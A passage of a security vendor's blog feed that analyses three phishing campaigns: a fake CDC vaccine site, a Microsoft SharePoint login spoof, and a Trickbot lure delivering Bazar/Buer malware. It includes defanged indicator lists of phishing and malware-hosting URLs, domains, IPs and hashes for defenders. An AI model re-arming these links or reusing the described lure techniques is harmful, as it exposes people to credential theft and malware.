resolved to the same IP address that may also potentially be in use by the attacker. These domains follow a similar pattern, each having a mail-themed second-level domain that contains a random 4-6 digit sequence. However, at the time of our research, these sites had either been parked or taken offline.</p><p>Further investigation of the domain for the phishing website resulted in identification of five subdomains, revealing the domain owner’s use of cPanel:</p><ul><li><p>cpanel[.]mail10298[.]buzz</p></li><li><p>cpcalendars[.]mail10298[.]buzz</p></li><li><p>cpcontacts[.]mail10298[.]buzz</p></li><li><p>webdisk[.]mail10298[.]buzz</p></li><li><p>webmail[.]mail10298[.]buzz</p></li></ul><p>cPanel is a web hosting control panel that allows end users to easily manage their websites. All of the domains noted above are default service subdomains for mail10298[.]buzz and were automatically generated by cPanel. Given the creation date for the domains was less than a day before the phishing campaign was underway, it’s safe to assume that the attacker is likely the owner of mail10298[.]buzz.</p><p>However, <i>legitimate</i> sites using cPanel can also be leveraged in phishing attacks. These sites are often the target of various hacks, including compromise via <a href="https://www.tripwire.com/state-of-security/security-data-protection/phishers-send-out-fake-cpanel-security-vulnerabilities-advisory/">cPanel-themed phishing attacks</a>. Compromised cPanel sites can then be used to further more elaborate social engineering scams.</p><p>Gaining unauthorized access to legitimate cPanel accounts provides a stealthy avenue for leveraging benign domains in email-borne attacks, helping to better evade phishing protection solutions.</p><p>Navigating directly to <code>hxxp://mail10298[.]buzz</code> exposed an OPSEC blunder by the attacker — an open directory of the phishing website, as shown in Figure 4.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5bqArmfZpLkCzoqVUrxmof/c578e68ad7b2a95c05537e0f22f61159/image2-1.png" />
            
            </figure><p>Figure 4. Index of “CDC” COVID-19 Website</p><p>The main index for the site was publicly available and conveniently contained the archive “covid.zip”. Stored in this ZIP archive were files containing fairly basic HTML and PHP scripts.</p><p>One file in particular caught our interest: process.php. This script, a portion of which is shown below in Figure 5, was most likely taken from open source code for processing HTML forms  using PHP. This is evident in the extensive commenting and default values that still remain in the script.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6qcWaT9gqG3VTzQGxo7Bly/8feecc00e20192a4aa6235df3dc9bbd7/image3-1.png" />
            
            </figure><p>Figure 5. Portion of process.php Script</p><p>If a victim submits the information they entered on the form, process.php triggers an HTTP GET request to a generic PHP mailer, which then sends the victim’s information to the attacker, including the victim host’s IP address.</p><p>To thwart these devious vaccine-themed phish, Area 1 Security uses multiple <a href="https://www.cloudflare.com/zero-trust/products/email-security/">advanced anti-phishing techniques</a> that:</p><ul><li><p>Leverage insight gained from early identification of attacker campaign infrastructure, enabling superior detection of emails from spoofed domains and accounts;</p></li><li><p>Analyze email for threat indicators, such as recently registered domains, domain name obfuscation, and look-a-like domains; and</p></li><li><p>Use real-time correlation with associated brand infrastructure to verify authenticity</p></li></ul><p>Area 1 also uses lexical analysis of message body and subject to detect attacks aimed at stealing sensitive information. To find phish, our technology goes beyond validation of SPF, DKIM and DMARC records. Using preemptive threat hunting and a broad set of proprietary analysis techniques, Area 1 identifies phishing campaigns, including those with malicious newly registered domains, that other defenses miss.</p><p>Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover the clever tactics seen in this campaign, enabling us to block the messages in real-time instead of waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Phishing Link:</b></p><p>hxxps://mail10298[.]buzz/covid/index.php</p><p><b>Phishing Domain and Subdomains:</b></p><p>mail10298[.]buzz</p><p>cpanel[.]mail10298[.]buzz</p><p>cpcalendars[.]mail10298[.]buzz</p><p>cpcontacts[.]mail10298[.]buzz</p><p>webdisk[.]mail10298[.]buzz</p><p>webmail[.]mail10298[.]buzz</p><p><b>Sender IP:</b></p><p>102[.]130[.]119[.]118</p><p><b>PHP Script:</b></p><p>process.php (SHA256 hash: f2023582408358590d9e1576422b5c13addfa740d0d3c9afd46c0982e45d1149)</p><p><b>Website Image Containing Misspelled Word “Vassine”:</b></p><p>logo.png (SHA256 hash: 5fd24dca599cc5220e7ea7271a89ea660c9d769177e4f07a0cd7d0fa485f9ffa)</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">1wx5Uix3LoNEHnQavaLyqZ</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Phishpoint back in full swing: an infamous Microsoft SharePoint spoof resumes with new tactics]]></title>
            <link>https://blog.cloudflare.com/microsoft-sharepoint-covid19-phishing/</link>
            <pubDate>Fri, 11 Dec 2020 12:03:00 GMT</pubDate>
            <description><![CDATA[ Our researchers detected an updated wave of Microsoft SharePoint phish that are leveraging new COVID-19 restrictions to steal victims’ login information. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in December 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>In August, Area 1 Security researchers identified a Microsoft SharePoint phishing campaign that abused cloud computing services, such as Azure Web Sites, Google Storage, and Amazon Web Services, to host credential harvesters. <b>Most recently, our researchers detected an updated wave of Microsoft SharePoint phish that are leveraging</b> <a href="https://www.nytimes.com/live/2020/11/27/world/covid-19-coronavirus"><b>new COVID-19 restrictions</b></a> <b>to steal victims’ login information.</b></p><p>While this new COVID-19 phishing campaign is incredibly widespread, Area 1 Security noted that a majority of the targets included upper-level management and executives. The attacker may be focusing the bulk of the attacks on these individuals in order to have a better chance of gaining access to sensitive information and potentially infiltrating the target network.</p>
    <div>
      <h3>Just Another Work Email?</h3>
      <a href="#just-another-work-email">
        
      </a>
    </div>
    <p>This new campaign deviates from the previous “Summer Bonus” Microsoft Office 365 phishing campaign by attempting to trick targets into thinking they missed an important update to COVID-19 procedures. As seen in Figure 1, the attacker states that a purported SharePoint-hosted document was sent a week prior, creating a sense of urgency in order to lure targets into clicking on the provided link.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/10ew2nlngWsc3BH6Gt1PED/1e1c5e0e13f2f7f88e12c53bec1cadd2/image3-2.png" />
            
            </figure><p>Figure 1. SharePoint Phishing Email</p><p>The new COVID-19 campaign contains many of the same hallmarks as the previous bonus-themed phish, such as tailoring each message to include the target’s email and company name throughout the body of the message and in the spoofed sender address. However, this time around, the attacker improved upon their formatting to appear more convincing.</p><p>As with the previous PhishPoint campaign, the attacker continues to use Virtual Private Servers (VPS) to send their phishing messages. Area 1 Security researchers identified roughly 100 unique sender addresses associated with this “COVID Requirements” campaign. The attacker used three main VPS services - CrownCloud, HostWinds, and MGNHost.</p><p>The versatility of a VPS allows the attacker to remain anonymous and also provides the ability to continually pivot to new infrastructure as soon as a phishing domain or IP address is identified as malicious.</p><p>To a lesser extent, the attackers also sent the phishing messages through a leading transactional and marketing email provider, SendGrid. This company is known for their presence, experience and expertise in email delivery. As a result, SendGrid’s domain is commonly whitelisted. For this reason, threat actors will often launch their phishing campaigns by abusing reputable providers like this.</p><p>Not only that, but with SendGrid, the message will easily pass email authentication. This demonstrates just how <a href="https://www.area1security.com/resources/data-sheet-why-dmarc-spf-dkim-limited-against-phishing/">DMARC fails at stopping phishing attacks</a>.</p><p>The use of SendGrid is also a clever way to circumvent Secure Email Gateways (SEGs). SEGs that predominantly depend on email authentication and sender reputation (SPF, DKIM, DMARC) will completely miss these types of phishing attacks.</p>
    <div>
      <h3>Analysis of Spoofed Microsoft Login Page</h3>
      <a href="#analysis-of-spoofed-microsoft-login-page">
        
      </a>
    </div>
    <p>Disguised as a simple “Open” button, the link in the message body leads to a spoofed Microsoft login page hosted on various cloud computing platforms, including Amazon Web Services, Google’s Appspot engine, and Firebase. These top tier, widely-used cloud services provide attackers the perfect platform for hosting their malicious content, all the while flying under the radar of legacy vendor email security solutions.</p><p>An example link, hxxps://x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com/#<a>redacted@redacted.com</a>, shown in the address bar in Figure 2, further demonstrates the targeted nature of the attacks. The redacted information in the URL contains the target’s company email address. To further add legitimacy, this spoofed site is nearly identical to the real Microsoft login page. The only discernible difference is the inclusion of the word “Outlook.”</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2UkOsrJOZ4IcqPO6dTjodI/30aad0c95ad609443b21b3ab1b499a7e/image1-3.png" />
            
            </figure><p>Figure 2. Spoofed Microsoft Login Portal</p><p>Figure 3 shows a portion of the source code of the spoofed login page. This section of code consists of JavaScript that attempts to mimic the functionality of the legitimate Microsoft login page.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6WujgZRceknQImQfcIflzs/f6c566112c2dd009d21a214167595a5b/image2-2.png" />
            
            </figure><p>Figure 3. JavaScript of Spoofed Login Page</p><p>The code calls a custom function responsible for extracting the victim’s email from the URL and prepopulating it in the account username field. In this function the actor left a portion of commented code (presumably used by the developer of the code for testing purposes) as highlighted in Figure 4.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1bQlfWsHPafn9QTDswuYbv/016fc321f76f4a6f78d0c62623937d1c/image6-2.png" />
            
            </figure><p>Figure 4. Custom Function Containing Commented Code</p><p>The commented code specifies a link that contains the string “office1withemail” in the URL path. Pivoting on this code, Area 1 Security researchers identified a massive number of phishing attacks, dating back to at least April 2019. These attacks leveraged a large variety of phishing themes, used numerous cloud hosting and VPS providers to send the messages, and targeted a slew of industry verticals.</p><p>It's possible these attacks are the work of a single group. However, given the nature and pervasiveness of the activity - and the fact that all of the attacks used JavaScript that contained the same commented code - a phishing kit may be at play.</p><p>If the target enters their password, it is posted to a website hosted on Microsoft Azure Web Sites, for example hxxps://fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net/handler[.]php, as revealed in Figure 5.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ZnDKBssQT8MxCzPBie6nL/4a070855d6c2b86a8ffa67a0ff99dc39/image5-3.png" />
            
            </figure><p>Figure 5. HTTP Post of Victim Credentials</p><p>After the credentials are entered, the .ldsddddd function above displays a spinning circle next to the “Sign In” button, making it appear as if the credentials are being validated. After several seconds have passed, the error message shown in Figure 6 is displayed.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/263zPzyWhhvnNrPQvy9GQI/d51ef834c60d20d35ce80b4d6229012a/image4-3.png" />
            
            </figure><p>Figure 6. Error Message Displayed After Credentials Are Entered</p><p>No matter what value is entered, the victim is led to believe they provided an incorrect password. To reduce suspicion, if the victim clicks on the “Forgot my password” link, the browser redirects to the real Microsoft password reset page.</p><p>This pervasive “COVID Restrictions” campaign is an ongoing threat to many individuals and businesses alike. The use of VPS and leading email service providers, as well as abuse of multiple cloud services throughout several stages of the attack, make it a particularly difficult campaign to detect.</p><p>To make matters worse, because the URLs used in the attacks point to legitimate domains and the messages contain no malicious payloads, traditional defenses will continually miss phish like this. In fact, Microsoft’s native Office 365 email security failed to stop this phishing attack despite these red flags.</p><p>Fortunately, Area 1 Security detected this stealthy campaign and stopped these phish from reaching our customers’ inboxes.</p><p>Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real-time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Malicious Links:</b></p><p>hxxps://pidbbhitbt8007dtdhdlbhhp[.]azurewebsites[.]net/handler[.]php</p><p>hxxps://fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net/handler[.]php</p><p>hxxps://03ssrd3334phd00p4sh0s33drcorequemenxxkjw3450w1jklsha[.]s3-ap-southeast-1[.]amazonaws[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://owacovctctsttc00tscqcqts0c1tq[.]s3-ap-northeast-1[.]amazonaws[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://s3-ap-northeast-1[.]amazonaws[.]com/cxrequirement[.]sharepointeseugwpjlmahxedgkqsbjlzfgsn/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/owa9y0y90yh9y9ffy2990hfy90h[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/sharedpoinnlinej27pj07jjppl7jp[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/sharedpointoneqqnfcefoqi0e6cf[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/sharedpointowauthdhljd1l0tdka0[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/shonecov19dn1n1lnfflnbfblf1d[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://tlook-off365-signin[.]web[.]app/#@&lt;targeted_company_domain&gt;</p><p>hxxps://x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com/#@&lt;targeted_company_domain&gt;</p><p>hxxps://y02hh200222fyhffh90yhyhh[.]s3[.]us-east-2[.]amazonaws[.]com/index[.]html?eid=@&lt;targeted_company_domain&gt;</p><p>hxxp://d-nb[.]xyz/?e=@&lt;targeted_company_domain&gt;</p><p><b>Malicious Sites:</b></p><p>pidbbhitbt8007dtdhdlbhhp[.]azurewebsites[.]net</p><p>fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net</p><p>03ssrd3334phd00p4sh0s33drcorequemenxxkjw3450w1jklsha[.]s3-ap-southeast-1[.]amazonaws[.]com</p><p>owacovctctsttc00tscqcqts0c1tq[.]s3-ap-northeast-1[.]amazonaws[.]com</p><p>y02hh200222fyhffh90yhyhh[.]s3[.]us-east-2[.]amazonaws[.]com</p><p>s3-ap-northeast-1[.]amazonaws[.]com/cxrequirement[.]sharepointeseugwpjlmahxedgkqsbjlzfgsn</p><p>storage[.]cloud[.]google[.]com/owa9y0y90yh9y9ffy2990hfy90h[.]appspot[.]com</p><p>storage[.]cloud[.]google[.]com/sharedpoinnlinej27pj07jjppl7jp[.]appspot[.]com</p><p>storage[.]cloud[.]google[.]com/sharedpointoneqqnfcefoqi0e6cf[.]appspot[.]com</p><p>storage[.]cloud[.]google[.]com/sharedpointowauthdhljd1l0tdka0[.]appspot[.]com</p><p>storage[.]cloud[.]google[.]com/shonecov19dn1n1lnfflnbfblf1d[.]appspot[.]com</p><p>x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com</p><p>tlook-off365-signin[.]web[.]app</p><p>d-nb[.]xyz</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Microsoft]]></category>
            <guid isPermaLink="false">4oP7jGahPui7xQ0ZuxOSCG</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Phishing campaign threatens job security, drops Bazar and Buer Malware]]></title>
            <link>https://blog.cloudflare.com/trickbot-spear-phishing-drops-malware/</link>
            <pubDate>Mon, 09 Nov 2020 15:09:00 GMT</pubDate>
            <description><![CDATA[ A phishing campaign is threatening targets with false claims of employment termination. The goal of the attacker is to intimidate employees into clicking on a link that will ultimately lead to Bazar or Buer malware infections by way of Trickbot. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in November 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>“You’re fired……NOT!” An ongoing and rapidly evolving spear phishing campaign, hitting companies across industry verticals, is threatening targets with false claims of employment termination due to economic impacts from the global pandemic, among numerous other coercive tactics. The goal of the attacker is to intimidate employees into clicking on a link that will ultimately lead to Bazar or Buer malware infections by way of Trickbot.</p><p>Researchers at Zscaler ThreatLabZ noted this is the first time they have seen the two malware strains together. Additionally, they have associated this attack with the Trickbot gang, known to use a combination of different malware groups and bots to conduct attacks.</p><p>While Trickbot started out as a banking trojan, known for hijacking victims’ browser sessions once logged into their banking website, it has since been repeatedly repurposed for other objectives, including the ability to spread ransomware. This particularly maniacal and disruptive aspect of Trickbot functionality makes it a top contender for possible threats to the upcoming 2020 presidential election.</p><p>With ransomware as an option, Trickbot poses a significant threat to U.S. election infrastructure. The malware’s operators have the ability to compromise a massive number of voting machines during critical times in vote counting, undermining trust in the result. That, or they may even be able to disrupt the voting process altogether by affecting entire voting locations, preventing large portions of the voter population from casting their ballots.</p><p>This could explain the recent wave of Trickbot takedown efforts. A report from <a href="https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/">KrebsonSecurity</a> provided details of an operation that likely began on September 22nd and is conjectured to be a government counterstrike against the actors behind Trickbot. This activity, first identified by <a href="https://public.intel471.com/blog/trickbot-disruption-microsoft-short-term-impact/">Intel471</a> and possibly <a href="https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html">conducted by the U.S. Cyber Command</a>, attempted to disrupt Trickbot infrastructure by forcing the botnet’s controllers to issue bogus configurations.</p><p>These configurations swapped real controller IP addresses for the localhost address (127.0.0.1), preventing bots from calling home to receive commands. Not long after the phony configurations were sent, all known controllers appeared to have stopped properly responding to bot requests, suggesting the overall activity was a concerted, intentional effort to disrupt this pervasive botnet’s operations.</p><p>Another attempt was made on October 1st, presumably by U.S. Cyber Command, that similarly altered the controller IP addresses needed to receive commands. Compounding the effects of this effort, <a href="https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/">Microsoft</a> also attempted disruptions of Trickbot infrastructure by obtaining a court order to disable the botnet’s IP addresses, among other actions. Most recently, <a href="https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/">Microsoft issued an update</a> that they successfully took down 62 of the 69 Trickbot servers around the world with the remaining being unorthodox IOT devices.</p><p>However, these attempts reportedly would only have a short-term effect on Trickbot controllers since its operators use decentralized infrastructure that communicates over Tor, with blockchain-based EmerDNS as a fallback that is resistant to takedowns. Additionally, <a href="https://arstechnica.com/information-technology/2020/10/trickbot-the-for-hire-botnet-microsoft-attacked-is-scrambling-to-stay-alive/">Ars Technica</a> reports that Trickbot controllers are beginning to host their malware on other e-criminals’ servers.</p><p>Unsurprisingly, not long after the various Trickbot takedown operations occurred, Area 1 Security identified a prolific phishing campaign that intended to spread Bazar and Buer payloads via Trickbot. Worse yet, this newer stealthy malware in Trickbot gang’s arsenal of tools can be used to deploy additional malware, including ransomware.</p><p>Area 1 Security researchers found evidence that the Bazar loader dropped in this campaign will not continue with the infection if the locale of the victim’s device is in Russia, a common tactic seen with Trickbot. In fact, <a href="https://statescoop.com/recent-ransomware-surge-russian-criminal-group/">Cyber security researchers</a> believe Trickbot is the handiwork of cybercriminals operating out of Russia. Since at least 2019, this group has been responsible for a surge in ransomware attacks targeting schools systems, local governments and even law enforcement agencies in the United States.</p><p>While these e-criminal groups have always been operating at some level in recent years, their activity has surged in the lead-up to the 2020 Presidential election. This suggests that entities involved in the U.S. election are prime targets for foreign adversaries, both nation-state and cybercriminal groups alike.</p><p>Lining up with the <a href="https://www.dni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security">recent FBI/DNI press conference</a>, Russian and Iranian state-sponsored groups are confirmed to have exfiltrated voter registration information. Additionally, these nations are behind separate email spoofing campaigns designed to undermine faith in the U.S. election.</p><p>At the moment, it is unclear if the phishing campaign that Area 1 Security identified is being carried out by any of these groups or if it is purposefully targeting election administrators. Regardless, state and local election administrators should be extra vigilant as they tend to be highly vulnerable to phishing attacks, as highlighted in a recent Area 1 Security phishing report.</p>
    <div>
      <h3>Threatening Lures</h3>
      <a href="#threatening-lures">
        
      </a>
    </div>
    <p>This campaign employs a number of lures that threaten job security in order to intimidate targets into clicking on the provided URL. The phishing messages are very simple in their demand and appear to originate from persons of authority within the targeted company, as seen in Figure 1.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5CMJ7FcljJp8tMOV9OoRlQ/0ee883a63fe732711303f2f7b0c87e24/image4-4.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/20Y9cp7fAEER9DH26On25L/11add664ba4aabd7cf2c78bb20158d74/image3-3.png" />
            
            </figure><p>Figure 1. Phishing Messages That Threaten Job Security</p><p>The messages identified in this campaign are based on eliciting fear from the target audience, focusing on either employment termination or customer complaints. The current work-from-home operating model, and the resultant decrease in face-to-face contact, gives attackers the advantage by making email delivery of these types of “employment notifications” all the more believable.</p><p>Targets of this campaign could potentially believe that the post COVID shake up in their organizations is the reason they’re being let go. With many businesses closing down unusable office space, combined with an economic recession, there is enough plausibility for this wide-ranging attack to fool employees into believing that their position may be part of the now all-too-common budget cuts.</p><p>It's possible this Bazar and Buer campaign is part of the Trickbot operations that Microsoft and other partners are trying to defeat. If so, the activity Area 1 Security observed only further proves just how difficult it can be to counteract these complex operations. A litany of unique and ever-changing email accounts and IP addresses are at the threat actor's disposal. Despite the previously mentioned efforts to neutralize Trickbot controllers, the infrastructure used to support this particular campaign (if associated in any way) was hardly affected, where the attacker seems to have promptly resumed operations.</p><p>While disruption operations may have worked a decade ago, the Trickbot gang and other groups that rely on their Malware-as-a-Service (MaaS) offering are equipped with the necessary skills to continue their attacks without a hitch. Current botnets have all the professionalism of any IT company. They’re able to manage disruptions and bring back services with continuity planning, backups, automated deployment, and a dedicated workforce.</p><p>The campaign noted above centered on termination-related documents available at a provided URL. When clicked, the link directs the victim’s browser to either Google Docs or Constant Contact. By not attaching the malware as a file to the email, the attacker is able to bypass file scanning detections. Moreover, the use of common cloud-based hosting services allows the attacker to circumvent URL scanning techniques, as well as enables them to easily create new malicious links in the event that their URLs are identified as phishing pages.</p><p>The Google Docs or Constant Contact link in the email leads to a decoy preview page, as shown in Figure 2, that prompts the victim to open a list of terminated employees. The decoy also cleverly displays the often seen “If download does not start, click here”.  This link is where the malware is actually being hosted.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5wGzX804bISdYS6D1u6Eg2/9b56a4350a1b00c942fdb3cea3769d6d/image6-3.png" />
            
            </figure><p>Figure 2. Google Doc Decoy Preview Page with Redirect Link</p>
    <div>
      <h3>Analysis of Malware</h3>
      <a href="#analysis-of-malware">
        
      </a>
    </div>
    <p>As seen in the figure below, after clicking on the link found in the online document, the victim is presented with a dialog box to run the file. The file is actually a malicious PE32+ executable that is designed to run on all Windows systems.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3RFY4kQBjiUGuDZfNoSiUZ/1b3d226538bc3f15018e9c0e21ba5e40/image2-5.png" />
            
            </figure><p>Figure 3. Gaining Run Permission</p><p>After clicking “Run”, a series of events will take place on the victim’s device that will ultimately lead to installation of the Bazar backdoor or Buer loader.</p><p>First, the PE32+ executable noted above will decrypt the payload using an RC4 cipher, a portion of which is provided in Figure 4 below. The payload happens to be none other than Trickbot, and a different RC4 key is used for each iteration of the malware.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2alOc5N1phJIaAhAZyhgx1/5acc7a4354d11e6099fd1c9dc1d02d6d/image1-4.png" />
            
            </figure><p>Figure 4. RC4 decryption of Trickbot Payload</p><p>As detailed in Figure 5, Area 1 Security researchers identified the string “dave” at the end of the Trickbot payload in memory, which is consistent with <a href="https://www.netscout.com/blog/asert/emotet-whats-changed">prior reporting</a> on techniques employed by Emotet and Trickbot malware developers. This string reveals the attacker’s use of a custom packer to compress and encrypt the file, making it difficult for malware analysts to reverse engineer the payload.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2A938DBBelje7SlUcqqVEU/658ba32f68291248ee6542ede4a08ce9/image7-1.png" />
            
            </figure><p>Figure 5. “Dave” signature</p><p>Despite this anti-reversing technique, Area 1 Security discovered the Trickbot payload attempts to further infect the victim device by decrypting and running the BazarLoader. Loaders are an essential function that allow attackers to gain a foothold in a network and enable subsequent, more persistent infection via their command and control servers. This tactic opts for stealth by initially loading as little functionality as necessary.</p><p>In this case, the BazarLoader in turn attempts to download the Bazar backdoor via a <a href="https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-using-blockchain-dns-from-the-market-to-the-bazar/">blockchain dns lookup table</a>. This is a great tactic for attackers as it circumvents the need for traditional ISPs. Similar to bitcoin, Top Level Domains (TLDs) like .bit, .bazar, and .coin are not owned by a single authority but instead shared over peer-to-peer networks. This offers users the ability to bypass censorship and other government restrictions, but also provides a platform for attackers to conduct illicit activities that are safe from countermeasures.</p><p>As shown in Figure 6, to download the backdoor, the loader loops through eight unique IP addresses and five domains under the EmerDNS .bazar TLD.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/25QFjFOnAYTbUDnSzoXCLX/4a021c5317668f3e84d3998b3f37addc/image5-4.png" />
            
            </figure><p>Figure 6. Outbound Connections to Download the Bazar Backdoor</p><p>The second level domains are comprised of 12 alphabetical characters that are generated using a specific <a href="https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/">domain generation algorithm</a>. The malware runs through the list of generated .bazar domains to find one that is still actively hosting the backdoor.</p><p>Once the backdoor is downloaded and successfully run, that attacker can carry out any number of devious acts, including remotely executing commands, exfiltrating sensitive data, and deploying other payloads. These additional payloads range anywhere from post-exploitation frameworks like CobaltStrike to ransomware like Ryuk.</p><p>In fact, Trickbot is known to deliver Ryuk ransomware to devices via BazarLoader. In <a href="https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/">one instance</a>, after the initial Bazar infection, attackers exploited a recently disclosed vulnerability to escalate privileges and gain domain-wide ransomware infection just 5 hours after sending their phishing message. This is unfortunately just one of many possible outcomes that can result from successful infection via the phishing campaign Area 1 Security has observed.</p>
    <div>
      <h3>Recommendations</h3>
      <a href="#recommendations">
        
      </a>
    </div>
    <p>By leveraging a number of stealthy techniques, the threat actors behind this campaign have been able to easily evade legacy vendors and cloud email providers. Linking to legitimate, cloud-based sites within the phishing messages, combined with the use of takedown- and sinkhole-resistant EmerDNS TLDs, makes this a particularly difficult campaign to detect.</p><p>Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover the clever tactics seen in this campaign, enabling us to block the messages in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This means malware like Trickbot, the Bazar backdoor, and follow-on infection with ransomware, never have the opportunity to make their way onto our customers’ devices. Our solution has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Phishing Email Subject Lines:</b></p><p>Re:  Termination List</p><p>RE: termination, </p><p>Re: my visit and call</p><p>Re: meeting of </p><p>RE:  office</p><p>RE: office, </p><p><b>Malicious PE32+ Executable Linked to in Decoy Document:</b></p><p>Sha1: 895d84fc6015a9ad8d1507a99fb44350fb462c79</p><p>Sha256: a3b2528b5e31ab1b82e68247a90ddce9a1237b2994ec739beb096f71d58e3d5b</p><p>Md5: dbdb5ddd07075b5b607460ea441cea19</p><p><b>Sites Hosting Malicious PE32+ Executable:</b></p><p>hxxps://tees321[.]com/Document3-90[.]exe</p><p>hxxps://centraldispatchinc[.]com/Report10-13[.]exe</p><p>hxxps://www[.]4rentorlando[.]com/Text_Report[.]exe</p><p><b>Malicious Links in Phishing 